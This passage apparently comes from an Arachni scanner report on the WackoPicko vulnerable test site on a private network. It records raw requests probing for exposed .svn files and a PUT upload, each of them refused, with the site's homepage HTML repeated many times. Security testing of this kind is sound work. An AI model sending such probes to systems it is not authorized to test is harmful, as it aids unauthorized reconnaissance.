<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/upload/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:26 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 204
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/testing/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/upload/testing/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/testing/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:53:14 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/testing/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:51:33 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/css/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/css/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/css/.svn/wc.db
.
| Type | In | Action |
|---|---|---|
server |
http://192.168.0.26/WackoPicko/css/.svn/wc.db | http://192.168.0.26/WackoPicko/css/.svn/wc.db |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:51:35 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 197
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:49:51 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
